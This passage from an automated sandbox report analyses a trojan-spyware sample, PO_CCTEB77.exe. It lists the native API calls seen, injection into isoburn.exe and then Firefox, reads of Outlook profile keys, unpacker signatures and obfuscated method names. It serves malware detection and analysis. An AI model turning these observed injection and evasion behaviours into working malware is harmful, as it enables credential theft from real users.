            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802BA0 NtEnumerateValueKey,3_2_01802BA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802BE0 NtQueryValueKey,3_2_01802BE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802BF0 NtAllocateVirtualMemory,3_2_01802BF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802AB0 NtWaitForSingleObject,3_2_01802AB0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802AD0 NtReadFile,3_2_01802AD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802AF0 NtWriteFile,3_2_01802AF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802DB0 NtEnumerateKey,3_2_01802DB0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802DD0 NtDelayExecution,3_2_01802DD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802D00 NtSetInformationFile,3_2_01802D00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802D10 NtMapViewOfSection,3_2_01802D10
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802D30 NtUnmapViewOfSection,3_2_01802D30
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802CA0 NtQueryInformationToken,3_2_01802CA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802CC0 NtQueryVirtualMemory,3_2_01802CC0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802CF0 NtOpenProcess,3_2_01802CF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802C00 NtQueryInformationProcess,3_2_01802C00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802C60 NtCreateKey,3_2_01802C60
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802F90 NtProtectVirtualMemory,3_2_01802F90
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802FA0 NtQuerySection,3_2_01802FA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802FB0 NtResumeThread,3_2_01802FB0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802FE0 NtCreateFile,3_2_01802FE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802F30 NtCreateSection,3_2_01802F30
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802F60 NtCreateProcessEx,3_2_01802F60
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802E80 NtReadVirtualMemory,3_2_01802E80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802EA0 NtAdjustPrivilegesToken,3_2_01802EA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802EE0 NtQueueApcThread,3_2_01802EE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802E30 NtWriteVirtualMemory,3_2_01802E30
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01803090 NtSetValueKey,3_2_01803090
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01803010 NtOpenDirectoryObject,3_2_01803010
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018039B0 NtGetContextThread,3_2_018039B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01803D10 NtOpenProcessToken,3_2_01803D10
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01803D70 NtOpenThread,3_2_01803D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E4650 NtSuspendThread,LdrInitializeThunk,5_2_050E4650
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E4340 NtSetContextThread,LdrInitializeThunk,5_2_050E4340
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_050E2D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_050E2D30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2DD0 NtDelayExecution,LdrInitializeThunk,5_2_050E2DD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_050E2DF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2C60 NtCreateKey,LdrInitializeThunk,5_2_050E2C60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_050E2C70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_050E2CA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2F30 NtCreateSection,LdrInitializeThunk,5_2_050E2F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2FB0 NtResumeThread,LdrInitializeThunk,5_2_050E2FB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2FE0 NtCreateFile,LdrInitializeThunk,5_2_050E2FE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_050E2E80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_050E2EE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2B60 NtClose,LdrInitializeThunk,5_2_050E2B60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_050E2BA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_050E2BE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_050E2BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2AD0 NtReadFile,LdrInitializeThunk,5_2_050E2AD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2AF0 NtWriteFile,LdrInitializeThunk,5_2_050E2AF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E35C0 NtCreateMutant,LdrInitializeThunk,5_2_050E35C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E39B0 NtGetContextThread,LdrInitializeThunk,5_2_050E39B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2D00 NtSetInformationFile,5_2_050E2D00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2DB0 NtEnumerateKey,5_2_050E2DB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2C00 NtQueryInformationProcess,5_2_050E2C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2CC0 NtQueryVirtualMemory,5_2_050E2CC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2CF0 NtOpenProcess,5_2_050E2CF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2F60 NtCreateProcessEx,5_2_050E2F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2F90 NtProtectVirtualMemory,5_2_050E2F90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2FA0 NtQuerySection,5_2_050E2FA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2E30 NtWriteVirtualMemory,5_2_050E2E30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2EA0 NtAdjustPrivilegesToken,5_2_050E2EA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2B80 NtQueryInformationFile,5_2_050E2B80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2AB0 NtWaitForSingleObject,5_2_050E2AB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E3010 NtOpenDirectoryObject,5_2_050E3010
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E3090 NtSetValueKey,5_2_050E3090
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E3D10 NtOpenProcessToken,5_2_050E3D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E3D70 NtOpenThread,5_2_050E3D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03024F10 NtCreateFile,5_2_03024F10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_030252C0 NtAllocateVirtualMemory,5_2_030252C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03025100 NtDeleteFile,5_2_03025100
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03025180 NtClose,5_2_03025180
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03025040 NtReadFile,5_2_03025040
            Source: C:\Windows\SysWOW64\isoburn.exeProcess Stats: CPU usage > 49%
            Source: PO_CCTEB77.exe, 00000000.00000002.2048537994.0000000007CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exe, 00000000.00000002.2045004163.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exe, 00000000.00000000.2023679936.0000000000E98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexoUr.exe2 vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exe, 00000003.00000002.2155052437.00000000018BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exeBinary or memory string: OriginalFilenamexoUr.exe2 vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PO_CCTEB77.exeReversingLabs: Detection: 70%
            Source: PO_CCTEB77.exeVirustotal: Detection: 66%
            Source: PO_CCTEB77.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO_CCTEB77.exe C:\Users\user\Desktop\PO_CCTEB77.exe
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess created: C:\Users\user\Desktop\PO_CCTEB77.exe C:\Users\user\Desktop\PO_CCTEB77.exe
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exe
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess created: C:\Users\user\Desktop\PO_CCTEB77.exe C:\Users\user\Desktop\PO_CCTEB77.exeJump to behavior
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_CCTEB77.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\7e327r58Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/14
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, JoGCmiYYfOfQ8BcErn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, JoGCmiYYfOfQ8BcErn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: PO_CCTEB77.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO_CCTEB77.exeStatic file information: File size 1154048 > 1048576
            Source: PO_CCTEB77.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO_CCTEB77.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: PO_CCTEB77.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: firefox.pdbP source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdb source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474515197.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474515197.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000000.2077705276.0000000000BDE000.00000002.00000001.01000000.0000000D.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4474211062.0000000000BDE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_CCTEB77.exe, 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2156691093.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2154766470.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_CCTEB77.exe, PO_CCTEB77.exe, 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000005.00000003.2156691093.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2154766470.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xoUr.pdbSHA256 source: PO_CCTEB77.exe
            Source: Binary string: firefox.pdb source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xoUr.pdb source: PO_CCTEB77.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ukVSDQTdm2TNByUUwo.cs.Net Code: u537T54O2O System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.3221438.1.raw.unpack, -Module-.cs.Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.3221438.1.raw.unpack, wA.cs.Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.86f0000.10.raw.unpack, -Module-.cs.Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.86f0000.10.raw.unpack, wA.cs.Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ukVSDQTdm2TNByUUwo.cs.Net Code: u537T54O2O System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0652C358 push es; ret 0_2_0652C370
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_08345191 push DC0654D5h; retf 0_2_0834519D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_08345390 push eax; retf 0_2_0834539D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834F71B push esp; iretd 0_2_0834F71E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0042B882 push eax; ret 3_2_0042B884
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00401887 push ebp; retf 3_2_00401889
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040509B push FFFFFFF5h; ret 3_2_0040509F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040D1DC pushad ; retf 3_2_0040D1E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004049AE push ebp; retf 3_2_004049B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00401A15 push esp; retf 3_2_00401A2F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004032D0 push eax; ret 3_2_004032D2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00413AD2 push ebp; retf 3_2_00413AD5
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00401AF6 push ebp; iretd 3_2_00401AFA
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00407C3E push ecx; ret 3_2_00407C51
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040CD3A push edx; ret 3_2_0040CD3B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00404DF4 push ebp; retf 3_2_00404DF8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00429603 push edi; ret 3_2_0042960C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0041AE3A push ebp; retf 3_2_0041AE3B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040175B push ebp; retf 3_2_00401774
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C09AD push ecx; mov dword ptr [esp], ecx3_2_017C09B6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050A09AD push ecx; mov dword ptr [esp], ecx5_2_050A09B6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0302632C push edi; ret 5_2_03026339
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03026330 push edi; ret 5_2_03026339
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03022373 pushad ; retf 5_2_03022376
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300E71F push ebp; ret 5_2_0300E735
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300E760 push ebp; ret 5_2_0300E735
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300E760 push ecx; ret 5_2_0300E78D
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_030107FF push ebp; retf 5_2_03010802
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_030285AF push eax; ret 5_2_030285B1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03022BA7 push cs; retf 5_2_03022BB1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300496B push ecx; ret 5_2_0300497E
            Source: initial sampleStatic PE information: section name: .text entropy: 7.829988304712993
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, XesiRELVHNOhhrfVEZ.csHigh entropy of concatenated method names: 'Got0LM1y6u', 'ql50sh7ICo', 'PXq08E7fRT', 'mNA0ifJFpv', 'xrh05ZyX1Z', 'IJ5038ORWv', 'X1O0IswAgN', 'jaU0MAHUqV', 'BsJ0NgmL6s', 'SlQ0pQZFKG'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, OPoh1b4QEceDLrvkUk.csHigh entropy of concatenated method names: 'Tq0GeE8sts', 'BQ2GDwe6FF', 'T0jGXbdoFi', 'RXMGxrCa1g', 'jasG2lYWjl', 'hd7XvbgjG8', 'XsEXOSTgIH', 'NMSXqp3YMG', 'l8TXCmfvs4', 'arpXVGtmhk'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, tAdYTf6ysPCeqbaoQh.csHigh entropy of concatenated method names: 'kkd98yAHjH', 'M9V9iMY51Q', 'wfH9kcLRXd', 'DWV9RXx8aa', 'XUa9ZIjge9', 'fPa9oZMTLj', 'Pcq9blxhQc', 'Sc99mYdKEj', 'sa19r8LuDD', 'fhv9fY5ySs'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ptRhSCx2027dPHp8xh.csHigh entropy of concatenated method names: 'CM6xBLuUA1', 'FKBx0dhl7B', 'WZYxGDq9j9', 'ftyGPPxmg3', 'OAwGzv712x', 'EpxxA2RHG2', 'rowxHLG7C9', 'IoqxUH0r98', 'U9mxlLM2Fv', 'uNvx7GrVDH'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ukVSDQTdm2TNByUUwo.csHigh entropy of concatenated method names: 'snOleBdIyM', 'gRdlBoQBZW', 'v8WlDnsa5a', 'O36l0clIpU', 'QT2lXMfnyu', 'fuulGucEUe', 'Ed1lxvqtik', 'wbvl2YxJhC', 'mDFlyXO4kB', 'KxVlE2XEuV'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, Lnwr9D8u5CxConU7J6.csHigh entropy of concatenated method names: 'O6YNH77grY', 'lxXNlgSTiL', 'bU2N7p6n0g', 'vNDNBCaBch', 'YccND0eMPr', 'ppQNXBxVO4', 'zfGNGf488Z', 'RybMqST211', 'YVyMC0JQ1h', 'HnyMV9E0Ne'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, KAEV8p9Wx9ew4CgZBa.csHigh entropy of concatenated method names: 'irtMBvBnRX', 'F8FMD0R98R', 'cesM0p4p30', 'nLqMXRmuWf', 'oh1MGSdNbn', 'n9sMxtSgvt', 'gIZM2JaTPJ', 'AB6MymNMCx', 'CTOMEVS32N', 'lG0Mwt6phm'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, JFWZ8gSIFh0boXHiGm.csHigh entropy of concatenated method names: 'uQQxu8QlUN', 'j1gxtSOfB3', 'OVsxTx1GSY', 'fZWxLKxUiY', 'aXLxdAuZCm', 'BI7xsSPmR3', 'WsDx6XZNaj', 'yVkx8uW1KG', 'W5rxilIpbb', 'fbpxK23JDP'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, oFEUOt3aVND6ltrtpp.csHigh entropy of concatenated method names: 'HJdICV5t9p', 'vDYIPsjTg4', 'a5RMAyYUqx', 'ETPMHxR4bg', 'OfBIfRoYxN', 'LIjIgJ6CFF', 'i1BIaNGfo9', 'Uf0IjCL9Uw', 'ESWInaxYBS', 'FCsIS3hGrc'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, FhsQhTKtpoLR3r0wPq.csHigh entropy of concatenated method names: 'hemMkLhZcP', 'b3lMREWIfp', 'xaUM4qBftu', 'BvhMZRMMki', 'lnIMjPLgkw', 'MscMoQJqG4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, hQZ8s0ylYf4am0IuMF.csHigh entropy of concatenated method names: 'tKtHxAlL6C', 'oMtH2dAw55', 'q2eHEqUXYK', 'lrgHwsqsLy', 'cklH5G3IkC', 'o0qH30o5A9', 'Jmuh8fbrmENpTTSta9', 'o4RcYbJ8aeGgvGcXBY', 'mwQHHTffNw', 'P39HlLUeBC'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, oMIbrIj3x62M5QOT6l.csHigh entropy of concatenated method names: 'ToString', 'e2w3fbWBef', 'eoT3RfnL6p', 'E0H34Bm1dc', 'I093ZALaTK', 'EMy3o17Ew6', 'sgb3Y28P8h', 'QPK3bX2sRS', 'J9S3mJcw5Y', 'Q5s3FMYR8g'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, NY2I822pxv8F9rHYWT.csHigh entropy of concatenated method names: 'Dispose', 'QeXHVn5HwU', 'z7NUR27HEy', 'XigccBVmtV', 'eW8HPFvhYb', 'oXIHzD9RnM', 'ProcessDialogKey', 'DQdUAmesRK', 'I7UUHSZqL5', 'IsEUUisTWK'
